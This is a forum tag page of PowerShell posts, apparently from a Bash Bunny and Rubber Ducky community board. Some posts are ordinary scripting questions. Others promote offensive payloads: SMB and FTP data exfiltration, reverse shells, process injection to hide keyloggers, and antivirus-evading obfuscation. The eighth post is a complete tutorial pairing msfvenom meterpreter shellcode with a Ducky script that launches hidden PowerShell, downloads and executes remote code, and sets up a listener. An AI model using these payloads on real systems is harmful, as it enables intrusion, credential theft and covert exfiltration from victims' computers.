Showing results for tags 'powershell'.
  1. I've updated my psh_DownloadExecSMB payload to allow for exfiltration. psh_DownloadExecSMB will take any PowerShell payload, execute it and alert via green LED when it's completed. All file transfers happen over SMB to the Bash Bunny. In order to exfil data, have your PowerShell payload upload to \\\s\l\ -- this will be copied to the BB as loot. Bonus: because this payload uses SMB, any captured SMB credentials will be stored as loot. My repo: https://github.com/hink/bashbunny-payloads/tree/payload/pshExecFixes/payloads/library/execution/psh_DownloadExecSMB Pull request: https://github.com/hak5/bashbunny-payloads/pull/268
  2. Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So... why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has finished executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo:
     - Write file (with content) to the desktop
     - Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible
     - Open calculator application
     - Message box -- powered by PowerShell
     Information about the payload, the payload script itself and how to configure it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack
  3. Okay all, I finally finished this thing well enough for me to release, but there is more work yet to be done. It works. Try it out and let me know what you think. I got tired of fiddling with it and just decided to get something out there. https://github.com/PoSHMagiC0de/BBTPS Oh, my first time actually using GitHub too. I usually have friends in town who do pushes on my behalf... because I am lazy. I decided to learn git and do it myself.
  4. Hello all, I have 4 headless PCs here at my house and I was wondering, in the event the internet goes down and I need to do a file transfer or something, could I just plug the Bash Bunny in and have it execute a PowerShell script so I don't have to find a spare monitor and keyboard? Thanks, new to the Bash Bunny.
  5. Hi guys, simple PowerShell question: if I want to copy a multi-line set of data to the clipboard, what is the best way to do it? I have the below at the moment, which successfully copies the data between the braces, however the variable $testing is literally copied as "$testing", and not as "blabla". Any better way of doing this? Thanks.
     $testing = "blabla"
     {Testing 1
     Testing 2
     Testing 3
     $testing
     etc
     } | clip
  6. Violation of CoC
  7. Why is the below not working correctly? It should Write-Host 'Active', but it doesn't. Thanks.
     PS C:\Windows\system32> $(Get-ADUser JoeBloggs -Properties *).PasswordExpired
     False
     PS C:\Windows\system32> if ($(Get-ADUser JoeBloggs -Properties *).PasswordExpired -eq "False") { Write-Host "Active" } else { Write-Host "Locked" }
     Locked
  8. Hello again friends! Today I will give a tutorial on how to create a payload that executes in under 10 seconds and gives you a fully functioning meterpreter shell back to your Kali Linux machine. This is done in under 20 lines of script. It's quite simple and works on any Windows machine with PowerShell installed (Windows 7 and above come with it preinstalled). I tested this first on my Windows 10 machine and it works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin, shall we?
     Step 1: Fire up Kali Linux and open a terminal. Using msfvenom we are going to create a shellcode. Enter this code:
     msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt
     The first part, "msfvenom", indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine; open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in PowerShell format (obviously, since we're using PowerShell). And the last part after the ">" indicates the location where this payload will be saved.
     Step 2: Now we are going to upload the shellcode to GitHub or Pastebin (whichever you prefer). Create a GitHub account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on GitHub and then upload the payload you just made (there are tutorials on Google for uploading files). You can upload the file a couple of different ways. The easiest is to just log on to GitHub from your Kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use Pastebin, upload to that!
     Step 3: Now the fun part! Time to code the Ducky. Copy and paste my code and change the corresponding lines.
     DELAY 500
     GUI x
     DELAY 1000
     a
     DELAY 1000
     ALT y
     DELAY 1000
     STRING powershell -WindowStyle hidden
     ENTER
     DELAY 1000
     STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
     ENTER
     DELAY 1000
     STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp')
     ENTER
     DELAY 1000
     STRING Invoke-Shellcode -Shellcode ($buf) -Force
     ENTER
     What is going on here is we are calling the Windows + X button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up PowerShell, BUT IT OPENS IT UP HIDDEN. So the actual PowerShell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After PowerShell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, for the second IEX string, you want to replace the last link with whatever the link to your script is on your GitHub account. Remember the one you uploaded? You want to click on GitHub the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used Pastebin, just place that link into the code.
     To set up the listener, open up a terminal in Kali.
     >msfconsole
     >use exploit/multi/handler
     >set payload windows/x64/meterpreter/reverse_https
     >set LHOST XXX (whatever IP you used, which would be your Kali machine IP)
     >set LPORT XXX (whatever port you used)
     >exploit
     And there you go! Of course, have your listener running before doing the attack. If you have any questions, please comment! This is my first actual tutorial, so feedback is wanted.
  9. I'm having trouble writing a PowerShell script that will 'exit' the terminal after running the code. This problem occurs when using a Quack script on the Bash Bunny. Here's the end part of the Ducky script that I wrote: I'm pretty sure that's correct, and it should exit after deleting a file called ip.txt. However, no such luck. What I have tried to solve the problem:
     STRING EXIT
     STRING Exit
     STRING exit;
     STRING del ip.txt; exit;
     But none of these make a difference. I even checked a Ducky script written by DarrenHak5 who has the same way of exiting the PowerShell terminal. So, I can't understand why it's not working for me. If I manually type exit it will do so; if the HID types it, it will not exit. Guys, do you have any suggestions? Thanks
  10. https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber It has been a while since my script was updated, so if anyone wants to help make it more effective or make it faster it would be much appreciated :D
  11. Hi guys, I have the following PowerShell code:
     $FolderPath = "\\server\folder1\folder2\~folder3"
     $SplitFolder = $FolderPath -split '\\'
     I can then echo each split using:
     echo $SplitFolder[2]
     server
     echo $SplitFolder[3]
     folder1
     echo $SplitFolder[4]
     folder2
     but when I get to echo $SplitFolder[5], because the folder name begins with a tilde (~), it fails:
     echo $SplitFolder[5]
     Cannot index into a null array.
     At line:1 char:1
     + echo $SplitFolder[5]
     + ~~~~~~~~~~~~~~~~~~~~
         + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
         + FullyQualifiedErrorId : NullArray
     Any ideas why the -split fails to set the variable correctly for the folder beginning with a tilde? Please note that I am planning on making the folder path an input from the user, so they may put in any path. Therefore, I cannot simply escape the one character, as it will be different each time. Thank you.
  12. Hello, I wanted to download files via CMD, and the first way I discovered was FTP. I rent a server and everything worked. The problem is that it takes kind of long to type in the credentials. After some research I found this PowerShell line:
     powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/file.exe','%TEMP%\file.exe')
     But I have some questions: What is the part after %TEMP% for? Is that the destination where the file "arrives"? So if I wanted to download it to C:\, I just have to change it to C:\, right? Where can I host the file for free? I found some web server hosting sites, but the only databases I was able to find were FTP and MySQL. Thank you for your help ;)
  13. Hopefully I get the voting thing right as I wanted to add content; we will see. If you see 2 separate posts, it is because I am ignant. (spelled wrong on purpose). So, in my travels on this board, I have come across people building agents to run their PowerShell scripts. Most make out fine. What has prompted this is I have been asked a few times about how I build an agent or even for help in building one. The BBTPS is awesome, it just is advanced and scary to some. Plus if you are running only 1 payload and need no dynamic payload delivery then BBTPS is too much. Welp, I like helping, some of the time. In this case I am a helper. Who here would like a general purpose PowerShell agent? All of its control can be done from the parameters for the function. Plan: It will be a single-run-only agent, meaning once the script is run, it will exit unless the script doesn't end. Delivery of contents and results back to the server is not controlled by the agent like in its original version but controlled by the script that is run. This means your script is responsible for talking back to the BB in whatever way you choose to deliver its contents. Instead of the version 1.0 version of bbAgent.ps1 that assumes all scripts are compressed, this will be the pre-1.0 which can take a script as text, compressed or plain utf8 base64 encoded. This means whatever format you choose, the script has to be formatted as such, with a launcher command if it is a function that requires calling. All configuration is done from parameters used when the function for the agent is launched:
     - Protocol (SMB, HTTP, USB)
     - Location: dynamic param, and depends on Protocol whether this will be a full URL, network path or drive path for the script to be run.
     - Encoding: is it text, compressed or base64.
     I have more but first want to know the interest before I leave the BBTPS for a minute to do this. For it to work it will be a 2-stage launch like in a chain. Your Quack command will be calling the agent with parameters. It will download the agent and run it with parameters which should be pointing to the script you want to run. It will download, decode if it has to, and run your script. It will check on the job every two seconds. If it ends, it removes the job and exits cleanly. If the script keeps running, the agent keeps doing this cycle forever. Yeah, I type a lot.
  14. Hmm. So, who is interested in injecting their PowerShell process into another process to hide it? The only advantage to this is if you are not going to be there. Makes no sense to do it with the BB connected since you are going to be there, but if you ever wanted to leave something behind (like the keylogger payload) and want it to be hidden well, I can create a solution for you. I planned on doing it eventually when I was done optimizing the BBTPS but I can take a break from it to think of and create a template for y'all. It will be borrowing from the PowerShell Empire team's PSInject module which uses the reflectivedllinject module from PowerSploit to inject a dll that is 32-bit or 64-bit (dll holders and code to inject base64 unicode PowerShell into it before injection are all the PowerShell Empire team's work, no need to reinvent the wheel. You can see I am a fanboy of theirs. :-P). The ideal way to use this is your launcher will be what is injected, which will download the rest of the script. The reason for this is the placeholder in the dlls for the PowerShell code is only 3000 bytes big. That means your script after being encoded (and it has to be encoded) can only be 3000 characters long. No compression supported. Encode it and then do a length on it to see. But... your launcher will most likely be tiny and it will download and load the rest of the script, which will have no limitation. The limitation is only with the initial PowerShell code injected into the dll. It will have to be a 2-stage process. First stage is quacked and pulls the injector script. The injector script will be psinject, and the command to invoke it along with all parameters and your base64 script are appended to the end so it all gets downloaded and run with no additional stuff... or you can add an extra function to the injector to download your base64 script to add to the command and run. The script you use with the injector will be similar to the one first launched to get things started, meaning it is injected into the premade dlls and then into the process of your choice, and it then becomes the download cradle for your actual payload. So. Phase 1, get admin, or not if you are not aiming at a system process. Phase 2, run the first download cradle (same commands everyone is running to get their scripts started with QUACK) to get the injector that will inject and launch the second download cradle that will pull your actual script (like the keylogger). After it is running, you will not be able to see it unless you use a tool like Sysinternals Process Explorer and inspect the threads of that process. Warning: no output to the console is shown with an injected process unless you write it somewhere like to a file or send it back to the server, but consider the injected process to have no console access. Of course you could still launch programs and do message boxes to interact with the local terminal. If you inject a never-ending process, it will never end and will not be able to be killed unless you use Process Explorer to kill its thread or you kill the process it hides in. Reboot would work too. Once again, for quick smash-and-grab runs this is highly useless, but for deposits it is worthwhile. Let me know. No sense doing all the work with no interest hehe. "Just because you have a hammer, doesn't make everything a nail." :-P
  15. EncDecFiles.ps1
     Author: (c) 2017 by QDBA
     Version 1.0
     Description: EncDecFiles.ps1 is a PowerShell script to encrypt / decrypt a PowerShell (or any other) file with AES. You can use it to obfuscate your PowerShell script, so AV scanners don't detect it.
     Usage:
     EncDecFiles.ps1 < -Encrypt | -Decrypt >   # encrypt or decrypt a file
                     < -In Filename >          # Input File
                     [ -Out Filename ]         # Output File
                     [ -Pass Password ]        # Password
     Example 1 - encdecfiles.ps1 -In c:\test.ps1 -encrypt
     Encrypts file c:\test.ps1 with password "hak5bunny"; encrypted file is c:\test.enc
     Example 2 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -pass secret
     Encrypts file c:\test.ps1 with password "secret"; encrypted file is c:\test.enc
     Example 3 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -Out c:\encrypted-file.aes -pass Secret
     Encrypts file c:\Test.ps1 with password "Secret"; encrypted file is c:\encrypted-file.aes
     Example 4 - encdecfiles.ps1 -In c:\Test.enc -decrypt
     Decrypts an encrypted file c:\test1.enc to c:\test1.ps1 with default password "hak5bunny"
     How to run the encrypted PowerShell script: In the script "Run_Script_Example.ps1" you see an example of how to load and execute the encrypted script. Load the encrypted script into a variable. Then execute the function Run with the variable and a password.
     Download: https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles
  16. Discussion thread for Root CA installer. (No local admin rights necessary.) Current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and working) pull request waiting. Small how-to: create a self-signed root CA.
     Create the Root Certificate (Done Once). Creating the root certificate is easy and can be done quickly. Once you do these steps, you'll end up with a root SSL certificate that you'll install on all of your desktops, and a private key you'll use to sign the certificates that get installed on your various devices.
     Create the Root Key. The first step is to create the private root key, which only takes one step. In the example below, I'm creating a 2048 bit key:
     openssl genrsa -out rootCA.key 2048
     The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3:
     openssl genrsa -des3 -out rootCA.key 2048
     You'll be prompted to give a password, and from then on you'll be challenged for the password every time you use the key. Of course, if you forget the password, you'll have to do all of this all over again. The next step is to self-sign this certificate.
     openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem
     This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit.
     You are about to be asked to enter information that will be incorporated
     into your certificate request.
     What you are about to enter is what is called a Distinguished Name or a DN.
     There are quite a few fields but you can leave some blank
     For some fields there will be a default value,
     If you enter '.', the field will be left blank.
     -----
     Country Name (2 letter code) [AU]:US
     State or Province Name (full name) [Some-State]:Oregon
     Locality Name (eg, city) []:Portland
     Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords
     Organizational Unit Name (eg, section) []:IT
     Common Name (eg, YOUR name) []:Data Center Overlords
     Email Address []:none@none.com
     Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that the root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs into every browser in the entire world.
  17. Hello all, I have been trying to figure out a good payload to make for the Bash Bunny. Seems like most of you thought of the simple ones. The ones I was going to improve, it seems the authors are on it, so just dropping help here and there is really all that is needed. So, what could I write? Welp, after contributing to PowerShell Empire and using other frameworks and having a partial framework in PowerShell I stopped working on myself, I decided to re-purpose parts of it and put it toward the BB. I've been hearing people asking about dynamic switching and stuff like that. Welp, I decided to work on a Bash Bunny Total Pwn System. I am terrible at names. It comprises a nodejs server on the Bash Bunny serving payloads to a PowerShell agent that is launched on the machine. The whole process will be triggered by a stager that is quacked off onto the victim's machine. The stager will wait for the nodejs server to come up and pull the agent, which it will execute. The agent will check in and check for jobs. It pulls a job from the server every 2 seconds. Each job is in JSON that includes a name for what the job is to be called, and a filename to be called for the return info on the BB. Jobs are defined on the server in a JSON file. After all jobs are deployed and none are left, the agent will continue to check the server for jobs while there are still jobs running on the agent. Job results can be delivered as text back to the nodejs server or files can be delivered back to the BB via SMB. SMB delivery has to be included with the script job being run as the agent does not do this. When each job finishes on the agent, either its results will be returned or the job stats will be. When all jobs are done and none are left to retrieve, the agent will send the quit command back to the server so it can die and continue on in the payload script. The nodejs server will control the LEDs to let you know its status between each stage. The reason for continuing to search for jobs after none are left is if you have a script that will check or do something before it can do something else, you can pull that as a job and call back to the server to push a job to be deployed. It will be picked up on the next cycle, making this dynamic. So far I am 90% done with the server and about 30-40% done with the PowerShell agent. I hope to have a rough working version of it on GitHub in about a week or two depending on how busy I am with work. If you are wondering about it working on Mac and Linux: the server will be fully neutral. That means if you have the skills, you can create an agent for those two OSes. I will be busy with the server and PowerShell agent mostly. A good example of building a python agent can be seen by looking at the Empire 2.0 python agent code on GitHub. That could give you some ideas, minus all the roll-your-own crypto it does. Payloads will have the ability for you to format them before loading them on the BB as regular text, base64 encoded (utf8, not unicode, so you can use python to encode it without having to add 0x00 after each byte) or compressed. I will be putting some PowerShell tools to help with creating these payloads on GitHub as well. I modified PowerSploit's Out-EncodedCommand to output only the compressed encoded script without the command to decompress it and the powershell part. The agent has a function to handle decompressing it back to full form. This is useful for large scripts. I have said a lot about it so far. I will probably have the code up before I can build detailed docs for it, so the first iteration will be instructions on what is necessary to get started. Future additions after the first release will include an extras URL for pulling down extra files like dlls or whatnot in base64 encoding that you can use in your script, like reflective injection, or like one I built for Empire and have all modularized and everything and have yet to submit a push to the Empire repo. It is a proxy hijacker. If you are admin, have a Burp session running and the public cert, this script can point a victim's machine at your Burp computer to be proxied via HTTP and HTTPS and install the Burp cert into the machine's local machine trusted root authorities. I like to call it "Perfect Man in the Proxy" or "ProxyHijack". The cert can be pulled by the script later to be used from the extras URL. No more typing, more coding. Stay tuned. Yeah, kinda big for my first BB project.
  18. Localized SMB Powershell delivery. For when USB and Web methods are disabled or too noisy. https://github.com/hak5/bashbunny-payloads/pull/172
  19. Violation of CoC
  20. I liked the USB Exfiltrator so much I wanted to try and make one that was able to grab everything and dump it to an FTP site. This way if there are large/many documents it wouldn't fill up the Bash Bunny. The script is pretty simple: it executes a PowerShell script that clears the run history and then starts uploading the user's documents directory. It will keep PowerShell running in the background, so if there are a lot of files or large files go ahead and unplug the BB once the status light is green; it will just keep going. Still new to this and know there will be some bugs or errors, so I welcome any feedback. https://github.com/nutt318/bashbunny-payloads/tree/master/payloads/library/ftp_exfiltrator
  21. Here's a simple payload to download and execute a PowerShell payload locally from the Bash Bunny. This payload is especially useful when running larger PowerShell scripts. It's much faster than waiting on HID keystrokes.